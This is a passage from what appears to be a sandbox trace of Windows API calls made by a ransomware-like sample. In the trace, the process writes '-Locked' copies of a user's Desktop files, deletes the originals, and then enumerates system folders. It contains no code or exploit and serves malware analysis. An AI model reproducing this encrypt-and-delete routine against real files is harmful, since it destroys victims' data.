(lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v0zo8w_tvkiqjvrx6kqc.jpg")) returned 1 [0298.907] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked", lpFilePart=0x0) returned 0x2f [0298.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.907] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vl-8wx.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.908] GetFileType (hFile=0x444) returned 0x1 [0298.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.908] GetFileType (hFile=0x444) returned 0x1 [0298.910] CloseHandle (hObject=0x444) returned 1 [0298.911] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png", lpFilePart=0x0) returned 0x28 [0298.911] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vl-8wx.png")) returned 1 [0298.913] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked", lpFilePart=0x0) returned 0x3b [0298.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.913] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wjv4 vo51_-ctoxsde.gif-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.914] GetFileType (hFile=0x444) returned 0x1 [0298.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.914] GetFileType (hFile=0x444) returned 0x1 [0298.916] CloseHandle (hObject=0x444) returned 1 [0298.916] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif", lpFilePart=0x0) returned 0x34 [0298.916] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wjv4 vo51_-ctoxsde.gif")) returned 1 [0298.919] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked", lpFilePart=0x0) returned 0x3a [0298.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.920] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\y4hqqhoepb18-mrgw.pdf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.921] GetFileType (hFile=0x444) returned 0x1 [0298.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.921] GetFileType (hFile=0x444) returned 0x1 [0298.923] CloseHandle (hObject=0x444) returned 1 [0298.923] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf", lpFilePart=0x0) returned 0x33 [0298.923] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\y4hqqhoepb18-mrgw.pdf")) returned 1 [0298.925] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked", lpFilePart=0x0) returned 0x4f [0298.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.925] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\e zb4hlmv59fpdjuh6qt.m4a-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.926] GetFileType (hFile=0x444) returned 0x1 [0298.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.926] GetFileType (hFile=0x444) returned 0x1 [0298.928] CloseHandle (hObject=0x444) returned 1 [0298.929] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a", lpFilePart=0x0) returned 0x48 [0298.929] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\e zb4hlmv59fpdjuh6qt.m4a")) returned 1 [0298.933] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked", lpFilePart=0x0) returned 0x44 [0298.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.933] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ekq_za-wa.mkv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.934] GetFileType (hFile=0x444) returned 0x1 [0298.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.934] GetFileType (hFile=0x444) returned 0x1 [0298.936] CloseHandle (hObject=0x444) returned 1 [0298.937] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv", lpFilePart=0x0) returned 0x3d [0298.937] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ekq_za-wa.mkv")) returned 1 [0298.940] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked", lpFilePart=0x0) returned 0x4a [0298.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.940] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\itp31jjvgr0dsuq.wav-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.941] GetFileType (hFile=0x444) returned 0x1 [0298.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.941] GetFileType (hFile=0x444) returned 0x1 [0298.942] CloseHandle (hObject=0x444) returned 1 [0298.943] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav", lpFilePart=0x0) returned 0x43 [0298.943] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\itp31jjvgr0dsuq.wav")) returned 1 [0298.945] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked", lpFilePart=0x0) returned 0x41 [0298.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.945] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ixybal.avi-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.947] GetFileType (hFile=0x444) returned 0x1 [0298.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.947] GetFileType (hFile=0x444) returned 0x1 [0298.949] CloseHandle (hObject=0x444) returned 1 [0298.950] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi", lpFilePart=0x0) returned 0x3a [0298.950] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ixybal.avi")) returned 1 [0298.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked", lpFilePart=0x0) returned 0x4d [0298.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.953] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\s sewkydoda_c3bxch.ppt-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.954] GetFileType (hFile=0x444) returned 0x1 [0298.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.954] GetFileType (hFile=0x444) returned 0x1 [0298.956] CloseHandle (hObject=0x444) returned 1 [0298.957] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt", lpFilePart=0x0) returned 0x46 [0298.957] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\s sewkydoda_c3bxch.ppt")) returned 1 [0298.959] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked", lpFilePart=0x0) returned 0x4c [0298.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.959] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ujk4snw9z16p4ofdz.mp4-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.961] GetFileType (hFile=0x444) returned 0x1 [0298.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.961] GetFileType (hFile=0x444) returned 0x1 [0298.963] CloseHandle (hObject=0x444) returned 1 [0298.964] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4", lpFilePart=0x0) returned 0x45 [0298.964] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ujk4snw9z16p4ofdz.mp4")) returned 1 [0298.967] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked", lpFilePart=0x0) returned 0x46 [0298.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.967] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\yzl8r176shb.swf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.969] GetFileType (hFile=0x444) returned 0x1 [0298.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.969] GetFileType (hFile=0x444) returned 0x1 [0298.971] CloseHandle (hObject=0x444) returned 1 [0298.972] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf", lpFilePart=0x0) returned 0x3f [0298.972] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\yzl8r176shb.swf")) returned 1 [0298.974] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0298.975] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0298.976] CoTaskMemFree (pv=0x6c7110) [0298.976] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files", lpFilePart=0x0) returned 0x23 [0298.976] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0298.976] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0298.979] CoTaskMemFree (pv=0x6c7110) [0298.979] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0298.979] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0298.979] SHGetFolderPathW (in: hwnd=0x0, csidl=23, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs") returned 0x0 [0298.981] CoTaskMemFree (pv=0x6c7110) [0298.981] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", lpFilePart=0x0) returned 0x34 [0298.981] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0298.982] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0298.982] CoTaskMemFree (pv=0x6c7110) [0298.982] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX", lpFilePart=0x0) returned 0x15 [0298.982] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0298.982] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0298.982] CoTaskMemFree (pv=0x6c7110) [0298.982] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0298.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0298.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files", lpFilePart=0x0) returned 0x23 [0298.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x0) returned 0x24 [0298.999] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb8017995, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb8017995, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.000] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb8017995, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb8017995, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.000] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1c9d90, ftCreationTime.dwHighDateTime=0x1d7d4d9, ftLastAccessTime.dwLowDateTime=0x584d6b30, ftLastAccessTime.dwHighDateTime=0x1d7e370, ftLastWriteTime.dwLowDateTime=0x584d6b30, ftLastWriteTime.dwHighDateTime=0x1d7e370, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="active-charge.exe", cAlternateFileName="ACTIVE~1.EXE")) returned 1 [0299.000] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x55499555, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55499555, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55499555, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0299.001] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0299.001] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1dbc800, ftCreationTime.dwHighDateTime=0x1d770a5, ftLastAccessTime.dwLowDateTime=0xb9f5fd00, ftLastAccessTime.dwHighDateTime=0x1d7df76, ftLastWriteTime.dwLowDateTime=0xb9f5fd00, ftLastWriteTime.dwHighDateTime=0x1d7df76, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="oh pain.exe", cAlternateFileName="OHPAIN~1.EXE")) returned 1 [0299.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0299.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0299.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0299.002] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0299.003] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files", lpFilePart=0x0) returned 0x23 [0299.003] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x0) returned 0x24 [0299.003] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x10, 